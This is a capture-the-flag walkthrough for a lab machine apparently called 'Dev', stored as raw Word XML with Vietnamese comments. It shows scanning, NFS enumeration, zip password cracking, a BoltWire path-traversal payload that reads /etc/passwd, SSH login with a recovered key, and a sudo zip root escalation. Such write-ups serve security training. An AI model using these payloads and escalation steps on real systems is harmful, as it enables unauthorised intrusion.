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47B4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Dev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August 2, 2022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11:00 PM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-A -p- -T4 192.168.1.9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Starting Nmap 7.92 (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</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) at 2022-08-02 05:25 EDT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scan report for 192.168.1.9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is up (0.00063s latency).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65526 closed tcp ports (conn-refused)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      STATE SERVICE  VERSION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22/tcp    open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)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ssh-hostkey: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2048 bd:96:ec:08:2f:b1:ea:06:ca:fc:46:8a:7e:8a:e3:55 (RSA)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256 56:32:3b:9f:48:2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d:e0:7e:1b:df:20:f8:03:60:56:5e (ECDSA)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256 95:dd:20:ee:6f:01:b6:e1:43:2e:3c:f4:38:03:5b:36 (ED25519)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80/tcp    open  http     Apache httpd 2.4.38 ((Debian))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|_http-server-header: Apache/2.4.38 (Debian)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|_http-title: Bolt - Installation error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111/tcp  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> open  rpcbind  2-4 (RPC #100000)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rpcinfo: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program version    port/proto  service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100000  2,3,4        111/tcp   rpcbind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100000  2,3,4        111/udp   rpcbind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100000  3,4          111/tcp6  rpcbind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100000  3,4          111/udp6  rpcb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ind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100003  3           2049/udp   nfs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100003  3           2049/udp6  nfs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100003  3,4         2049/tcp   nfs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100003  3,4         2049/tcp6  nfs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100005  1,2,3      44395/tcp   mountd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100005  1,2,3      44467/udp   mountd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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>100005  1,2,3      50603/udp6  mountd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100005  1,2,3      50615/tcp6  mountd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100021  1,3,4      33353/tcp   nlockmgr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100021  1,3,4      34439/udp6  nlockmgr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100021  1,3,4      41307/tcp6  nlockmgr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100021  1,3,4      60353/udp   nlockmgr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100227  3           2049/tcp   nfs_acl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100227  3           2049/tcp6  nfs_acl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100227  3           2049/udp   nfs_acl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100227  3           2049/udp6  nfs_acl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2049/tcp  open  nfs_acl  3 (RPC #100227)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8080/tcp  open  http     Apache httpd 2.4.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8 ((Debian))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|_http-server-header: Apache/2.4.38 (Debian)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http-open-proxy: Potentially OPEN proxy.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|_Methods supported:CONNECTION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|_http-title: PHP 7.3.27-1~deb10u1 - phpinfo()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33353/tcp open  nlockmgr 1-4 (RPC #100021)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34621/tcp open  mountd   1-3 (RPC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>#100005)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44395/tcp open  mountd   1-3 (RPC #100005)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47567/tcp open  mountd   1-3 (RPC #100005)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Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel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ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u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http://192.168.1.9/FUZZ</w:t>
        </w:r>
      </w:hyperlink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                 [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 1ms]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Attribution-Share Alike 3.0 License. To view a copy of this  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 204ms]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This work is licensed under the Creative Commons  [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 216ms]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Copyright 2007 James Fisher [Status: 200, Size: 3833, Words: 926, Li</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nes: 108, Duration: 245ms]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src                     [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 1ms]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                     [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 1ms]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                      [Status: 200, Size: 3833, Words: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>926, Lines: 108, Duration: 452ms]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directory-list-2.3-medium.txt [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 466ms]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                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 1ms]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extensions              [Status: 301,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Size: 315, Words: 20, Lines: 10, Duration: 2ms]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ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u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http://192.168.1.9:8080/FUZZ</w:t>
        </w:r>
      </w:hyperlink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                     [Status: 301, Size: 315, Words: 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0, Lines: 10, Duration: 3ms]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ENUM NFS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showmount -e 192.168.1.9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Export list for 192.168.1.9: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/srv/nfs 172.16.0.0/12,10.0.0.0/8,192.168.0.0/16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sudo mount -t nfs 192.168.1.9:/srv/nfs /mnt/dev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have save.zip in nfs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zip2john save.zip &gt; save.hashes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john save.hashes                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default input encoding: UTF-8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Loaded 1 password hash (PKZIP [32/64])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Will run 3 OpenMP threads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Proceeding with single, rules:Single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Press 'q' or Ctrl-C to abort, almost any other ke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>y for status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Almost done: Processing the remaining buffered candidate passwords, if any.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Proceeding with wordlist:/usr/share/john/password.lst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Proceeding with incremental:ASCII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java101          (save.zip)    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1g 0:00:00:06 DONE 3/3 (2022-08-02 05:45) 0.166</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1g/s 5571Kp/s 5571Kc/s 5571KC/s bbs0048..javona1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the "--show" option to display all of the cracked passwords reliably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Session completed.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unzip save.zip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Archive:  save.zip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[save.zip] id_rsa password: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skipping: id_rsa                  incorrect pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>word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skipping: todo.txt                incorrect password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file config.yaml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http://192.168.1.9/app/config/</w:t>
        </w:r>
      </w:hyperlink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database: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driver: sqlite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databasename: bolt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>username: bolt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password: I_love_java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signup account in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http://192.168.1.9:8080/dev</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and add payload index.php?p=action.search&amp;action=../../../../../../../etc/passwd to exploit boltwire ( refer exploitdb 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http://192.168.1.9:8080/dev/index.php?p=action.search&amp;action=../../../../../../../etc/passwd</w:t>
        </w:r>
      </w:hyperlink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root:x:0:0:root:/root:/bin/bash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daemon:x:1:1:daemon:/usr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/sbin:/usr/sbin/nologin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bin:x:2:2:bin:/bin:/usr/sbin/nologin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sys:x:3:3:sys:/dev:/usr/sbin/nologin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sync:x:4:65534:sync:/bin:/bin/sync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games:x:5:60:games:/usr/games:/usr/sbin/nologin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man:x:6:12:man:/var/cache/man:/usr/sbin/nologin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lp:x:7:7:lp:/var/spool/lpd:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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mail:x:8:8:mail:/var/mail:/usr/sbin/nologin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news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</w:t>
        </w:r>
      </w:hyperlink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uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin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proxy:x:13:13:proxy:/bin:/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin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backup:x:34:34:backup:/var/backups:/usr/sbin/nologin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list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin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irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin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gnats:x:41:41:Gnats Bu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>g-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin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nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin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_apt:x:100:65534::/nonexistent:/usr/sbin/nologin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systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin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systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin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messagebus:x:104:110::/nonexistent:/usr/sbin/nologin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sshd:x:105:65534::/run/sshd:/usr/sbin/nologin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jeanpaul:x:1000:1000:jeanpaul,,,:/home/jeanpaul:/bin/bash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systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin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mysql:x:106:113:MySQL Server,,,:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/nonexistent:/bin/false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_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin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statd:x:108:65534::/var/lib/nfs:/usr/sbin/nologin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Ở</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> đây có tài kho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n jeanpaul có đi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m tương đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ồ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ng v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i jp trong file ki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m đư</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ợ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c, th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ử</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ssh l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i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ssh -i id_rsa jeanpaul@192.168.1.9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pa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ssphrase for key 'id_rsa':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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ử</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> passphrase I_love_java trong file conf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jeanpaul@dev:~$ sudo -l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Matching Defaults entries for jeanpaul on dev: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env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>er jeanpaul may run the following commands on dev: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(root) NOPASSWD: /usr/bin/zip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ở</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> đây chúng ta có zip, chúng ta vào trang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https://gtfobins.github.io/gtfobins/zip/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ph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 sudo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leo thang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jeanpa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ul@dev:~$ TF=$(mktemp -u)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jeanpaul@dev:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'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adding: etc/hosts (deflated 31%)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whoami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cd root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ls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flag.txt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cat flag.txt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00047B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Congratz on rooting this box !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49"/>
    <w:rsid w:val="000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D0CA9-6092-4A5D-9B53-719CEA39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9:8080/de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1.9/app/confi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9:8080/FUZZ" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/zip/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.9/FUZZ" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.9:8080/dev/index.php?p=action.search&amp;action=../../../../../../../etc/pass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1139</Words>
  <Characters>6495</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>54</Lines>
  <Paragraphs>15</Paragraphs>
  <ScaleCrop>false</ScaleCrop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2023-06-13T06:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-13T06:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>